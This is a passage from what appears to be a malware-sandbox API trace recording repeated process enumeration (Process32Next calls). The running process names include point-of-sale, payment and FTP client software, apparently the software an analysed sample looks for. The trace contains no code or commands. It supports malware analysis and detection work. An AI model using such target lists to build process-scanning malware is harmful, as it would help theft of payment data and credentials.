cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0292.321] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0292.324] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0292.327] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0292.330] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0292.333] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0292.336] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0292.341] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0292.344] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0292.347] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0292.350] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0292.353] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0292.356] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0292.360] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0292.364] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0292.367] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0292.370] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0292.372] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0292.375] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.378] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0292.381] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.383] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.386] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0292.389] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.391] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0292.393] CloseHandle (hObject=0x140c) returned 1 [0292.394] Sleep (dwMilliseconds=0x64) [0292.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0292.412] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.414] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.417] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.419] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.422] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.424] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.427] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.429] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.438] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.444] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.446] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.449] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.451] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.454] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.456] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.459] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.462] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.464] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.467] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.469] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.472] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0292.474] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.476] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0292.479] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.483] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0292.485] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0292.488] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0292.492] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0292.495] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0292.498] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0292.500] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.503] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.505] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0292.507] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.510] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.514] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.517] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.519] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.526] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0292.530] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0292.533] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0292.535] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0292.537] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0292.540] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0292.542] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0292.546] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0292.549] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0292.551] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0292.553] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0292.556] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0292.559] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0292.563] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0292.565] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0292.568] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0292.570] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0292.572] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0292.575] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0292.578] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0292.581] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0292.584] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0292.587] 